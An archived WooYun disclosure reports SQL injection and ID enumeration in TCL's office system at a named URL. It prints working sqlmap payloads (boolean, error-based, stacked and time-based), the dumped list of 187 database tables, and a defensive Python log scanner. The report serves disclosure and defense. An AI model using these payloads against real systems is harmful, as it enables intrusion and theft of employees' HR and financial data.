
Vulnerability summary

Defect ID: wooyun-2013-045719

Title: TCL # A vulnerability in an important office system leads to SQL injection and information disclosure

Vendor: TCL官方网上商城 (TCL official online store)

Author: Mr.leo

Submitted: 2013-12-12 15:48

Fixed: 2014-01-26 15:49

Published: 2014-01-26 15:49

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2013-12-12: Details sent to the vendor; awaiting vendor handling
2013-12-17: Vendor confirmed; details disclosed to the vendor only
2013-12-27: Details disclosed to core white hats and domain experts
2014-01-06: Details disclosed to regular white hats
2014-01-16: Details disclosed to intern white hats
2014-01-26: Details disclosed to the public

Summary:

TCL # A vulnerability in an important office system leads to SQL injection and information disclosure

Detailed description:

Site:
http://oa.tclking.com (TCL网络办公系统, the TCL online office system)
Because the site has no robots.txt, it has been crawled and indexed by search engines.

[Screenshot: 123.png]

Visiting the link in the red box discloses TCL internal information:
http://oa.tclking.com/companycase/CompanyGonggPrint.aspx?documno=S2012084700
The documno value can be enumerated: any ID of the form S2012XXXXXX returns the corresponding record.

[Screenshot: 456.png]

[Screenshot: 789.png]

The most serious problem is that this link is vulnerable to SQL injection.
Pangolin (穿山甲):

[Screenshot: 123123.png]

Running sqlmap:
sqlmap identified the following injection points with a total of 50 HTTP(s) requests:
---
Place: GET
Parameter: documno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: documno=S2012084705' AND 2378=2378 AND 'fiFx'='fiFx
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: documno=S2012084705' AND 6278=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(112)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (6278=6278) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(121)+CHAR(115)+CHAR(118)+CHAR(58))) AND 'AIEz'='AIEz
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: documno=S2012084705'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: documno=S2012084705' WAITFOR DELAY '0:0:5'--
---
current user: 'GICHrmDB'
current database: 'Hrm'
available databases [12]:
[*] distribution
[*] ECS
[*] Hrm
[*] Hrm_OEM
[*] HRM_SZ
[*] master
[*] model
[*] msdb
[*] OutStock
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: Hrm
[187 tables]
+------------------------------+
| dbo.AUTHORIZATION_TO_PAYMENT |
| dbo.Budge_right_tree |
| dbo.DevCmds |
| dbo.Devinfo |
| dbo.DinSysAccount |
| dbo.FAPAYMODEL |
| dbo.FAPINGZHENMODEL |
| dbo.FASUBJECT |
| dbo.FaceTmp |
| dbo.Finance_MainIndex |
| dbo.G4_worktimetable |
| dbo.HR_ConBase |
| dbo.HR_DeptToWorkNo |
| dbo.HR_UserGroup |
| dbo.HR_condition |
| dbo.Hr_OutDept |
| dbo.Hr_Position |
| dbo.Hr_Position_Bak |
| dbo.Hr_SelectTemp |
| dbo.Hrm_Freeze |
| dbo.Kq_AllWorkHour |
| dbo.OACITY |
| dbo.OAPROMARY |
| dbo.OASUPPLIERNO |
| dbo.OA_Account |
| dbo.OA_AccountRight |
| dbo.OA_BC_BudgetCost |
| dbo.OA_BC_FreebackMSG |
| dbo.OA_BC_VariableCost |
| dbo.OA_BC_userright |
| dbo.OA_Car_Booking |
| dbo.OA_Car_Driver |
| dbo.OA_Car_Info |
| dbo.OA_CartNO |
| dbo.OA_CompanyTemp |
| dbo.OA_Controlsub |
| dbo.OA_DocuMentList |
| dbo.OA_EmailRemind |
| dbo.OA_EmailRemindtest |
| dbo.OA_Exam_DB |
| dbo.OA_Exam_ExamMain |
| dbo.OA_Exam_Options |
| dbo.OA_FB_Mainmast |
| dbo.OA_FinanceList |
| dbo.OA_FinancePayMent |
| dbo.OA_GICFinancial |
| dbo.OA_Hr_CommunicationBase |
| dbo.OA_Hr_DictDB |
| dbo.OA_Hr_EducationBase |
| dbo.OA_Hr_EmployeeBase |
| dbo.OA_Hr_EmployeeBaseSed |
| dbo.OA_Hr_FamilyBase |
| dbo.OA_Hr_LaborContract |
| dbo.OA_Hr_LanguageBase |
| dbo.OA_Hr_NationalTitles |
| dbo.OA_Hr_WorkExperience |
| dbo.OA_MES_Board |
| dbo.OA_MainDocuMent |
| dbo.OA_MeetingQuitment |
| dbo.OA_MeetingRoom |
| dbo.OA_Meetingarea |
| dbo.OA_MessTrans |
| dbo.OA_MsgTemp |
| dbo.OA_NextDeptCode |
| dbo.OA_Post |
| dbo.OA_PostAccount |
| dbo.OA_ReplacecardRecord |
| dbo.OA_Role |
| dbo.OA_SMS |
| dbo.OA_UserRole |
| dbo.OA_WarehouseAuthorized |
| dbo.OA_base |
| dbo.OA_companydetail |
| dbo.OA_companymast |
| dbo.OA_companymast_bak |
| dbo.OA_deptleadership |
| dbo.OA_fiveSgr |
| dbo.OA_fiveSmsg |
| dbo.OMS_DocMain |
| dbo.OMS_MeetTable |
| dbo.OMS_Members |
| dbo.Oa_BC_Actualcost |
| dbo.Oa_BC_BUSapcodeTable |
| dbo.Oa_BC_BusinessCodeTable |
| dbo.Oa_BC_ChangeCode |
| dbo.Oa_BC_CodeTable |
| dbo.Oa_BC_Costrate |
| dbo.Oa_BC_FXrate |
| dbo.Oa_BC_SapcodeTable |
| dbo.Oa_BC_SubTable |
| dbo.Oa_Dictionary |
| dbo.Oa_Position |
| dbo.Oa_RightMast |
| dbo.Oa_dept |
| dbo.Oms_FileList |
| dbo.Oms_ItemDetail |
| dbo.Oms_ItemLog |
| dbo.Oms_ItemMenPer |
| dbo.Oms_ModelDetail |
| dbo.Oms_ModelMain |
| dbo.ProjectBase |
| dbo.ProjectItem |
| dbo.ProjectLog |
| dbo.SyncTemp |
| dbo.Sys_PrgMast |
| dbo.System_Menu |
| dbo.System_PrgMast |
| dbo.System_Update |
| dbo.System_UserMast |
| dbo.Table_1 |
| dbo.Tmp_10 |
| dbo.Tmp_9 |
| dbo.Tmp_90 |
| dbo.UserInfo |
| dbo.WF_Delegate |
| dbo.WF_ModelDetail |
| dbo.WF_ModelMast |
| dbo.[查询] |
| dbo.att_record |
| dbo.budget_upload_excel |
| dbo.deptMesTOHrm |
| dbo.dtproperties |
| dbo.fix_category |
| dbo.fix_dictdb |
| dbo.fix_fixedmast |
| dbo.fix_mark |
| dbo.fix_mess |
| dbo.fix_news |
| dbo.fix_orders |
| dbo.fix_sorts |
| dbo.hr_AddrSFZ |
| dbo.hr_RzEmailInfo |
| dbo.hr_base |
| dbo.hr_class |
| dbo.hr_department |
| dbo.hr_dept |
| dbo.hr_deptcopy |
| dbo.hr_emp_titles |
| dbo.hr_employee |
| dbo.hr_employeeBF |
| dbo.hr_employeeForSAP319 |
| dbo.hr_employee_lz |
| dbo.hr_employee_rz |
| dbo.hr_employee_tp |
| dbo.hr_employee_tpback |
| dbo.kq_DoorRecord |
| dbo.kq_LZDate |
| dbo.kq_Machines |
| dbo.kq_SpeOverTimeR |
| dbo.kq_SpeWorkRecord |
| dbo.kq_auto_Machines |
| dbo.kq_base |
| dbo.kq_cardlist |
| dbo.kq_finger |
| dbo.kq_holiday |
| dbo.kq_leave |
| dbo.kq_leaveDay |
| dbo.kq_leave_bak |
| dbo.kq_leave_main |
| dbo.kq_leavemonth |
| dbo.kq_machines_emp |
| dbo.kq_machines_log |
| dbo.kq_monthgs |
| dbo.kq_overtime |
| dbo.kq_overtime_bak |
| dbo.kq_transpose |
| dbo.kq_transpose_bak |
| dbo.kq_workday |
| dbo.kq_workday_bak |
| dbo.kq_workday_checkUp |
| dbo.kq_workmonth |
| dbo.kq_workmonth_lz |
| dbo.kq_workrecord |
| dbo.kq_workrecord_bak |
| dbo.kq_worktimetable |
| dbo.oa_TotalMoney |
| dbo.oa_TotalMoneySAP |
| dbo.oa_TotalMoney_Test |
| dbo.oa_accountbak |
| dbo.oa_totalmoney_Copy |
| dbo.oa_totalmoney_bak |
| dbo.sys_user |
| dbo.sys_userright |
| dbo.sysdiagrams |
| dbo.system_Per |
| dbo.tb_Temp |
| dbo.temptable |
+------------------------------+
An excerpt of the row counts:
Database: Hrm
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.kq_workrecord_bak | 22712493 |
| dbo.kq_workday_bak | 11426503 |
| dbo.kq_workrecord | 6574826 |
| dbo.kq_transpose_bak | 6475205 |
| dbo.kq_overtime_bak | 4174567 |
| dbo.kq_transpose | 2766671 |
| dbo.OA_companydetail | 1244995 |
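As an added example (not part of the original report or of the affected system), a small Python log scanner that applies the report's two findings defensively: it checks the documno parameter against the ID shape shown above (S followed by ten digits), classifies values that carry the sqlmap payload patterns quoted above, and lists client addresses that walk through several distinct valid IDs. The log lines, addresses and timestamps are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (hypothetical addresses and timestamps) mirroring the documno
# values quoted in the report. Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2013-12-10 09:12:01 203.0.113.5 GET /companycase/CompanyGonggPrint.aspx documno=S2012084700 200
2013-12-10 09:12:02 203.0.113.5 GET /companycase/CompanyGonggPrint.aspx documno=S2012084701 200
2013-12-10 09:13:40 198.51.100.7 GET /companycase/CompanyGonggPrint.aspx documno=S2012084705%27+AND+2378%3D2378+AND+%27fiFx%27%3D%27fiFx 200
2013-12-10 09:13:41 198.51.100.7 GET /companycase/CompanyGonggPrint.aspx documno=S2012084705%27;+WAITFOR+DELAY+%270:0:5%27;-- 200
2013-12-10 09:14:00 198.51.100.7 GET /companycase/CompanyGonggPrint.aspx documno=S2012084705%27+AND+6278%3DCONVERT(INT,(CHAR(58)))+AND+%27AIEz%27%3D%27AIEz 500
2013-12-10 09:15:00 203.0.113.9 GET /companycase/CompanyGonggPrint.aspx documno=abc 200
""".splitlines()
DOCUMNO_RE = re.compile(r"^S\d{10}$")  # shape of the IDs in the report, e.g. S2012084700
# Markers for the sqlmap techniques listed in the report, most specific first.
TECHNIQUE_MARKERS = [
    ("time-based/stacked", re.compile(r"WAITFOR\s+DELAY", re.I)),
    ("error-based", re.compile(r"CONVERT\s*\(\s*INT", re.I)),
    ("boolean-based", re.compile(r"'\s*AND\s+\d+\s*=\s*\d+", re.I)),
]

def check_documno(value):
    """None for a well-formed documno, otherwise a short reason string."""
    if DOCUMNO_RE.fullmatch(value):
        return None
    for name, pattern in TECHNIQUE_MARKERS:
        if pattern.search(value):
            return "sqli:" + name
    return "malformed"

def documno_values(query):
    """documno values from a raw cs-uri-query; split on '&' only so a ';' in a payload survives."""
    pairs = (part.partition("=") for part in query.split("&"))
    return [unquote_plus(v) for k, _, v in pairs if k == "documno"]

def scan_iis_log(lines, walk_threshold=2):
    """Return (findings, walkers): bad documno (ip, reason, value) tuples and ID-walking IPs."""
    findings, seen_ids = [], {}
    for line in lines:
        fields = line.split()
        if len(fields) < 7 or not fields[4].lower().endswith("/companygonggprint.aspx"):
            continue
        for value in documno_values(fields[5]):
            reason = check_documno(value)
            if reason:
                findings.append((fields[2], reason, value))
            else:
                seen_ids.setdefault(fields[2], set()).add(value)
    walkers = sorted(ip for ip, ids in seen_ids.items() if len(ids) >= walk_threshold)
    return findings, walkers
```

The same allowlist check (`DOCUMNO_RE`) belongs in the page itself before the value reaches the query, together with a parameterized query; the log scan only shows where the check was missing.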

[Screenshot: 77887788.png]


Proof of vulnerability:

The proof is the sqlmap listing of the 187 tables in database Hrm, as shown in the detailed description above.


Remediation:

1# Add a robots.txt
2# Fix the SQL injection vulnerability
3# High Rank

Copyright notice: when reposting, please credit the source: Mr.leo@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2013-12-17 14:52

Vendor reply:

Forwarded to the relevant department for confirmation and handling. Thank you.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2013-12-16 14:06 | Mr.leo (Regular white hat | Rank: 1314 | Vulnerabilities: 176 | What should I say!!)

    @TCL官方网上商城 Looks like this is heading for "ignored"??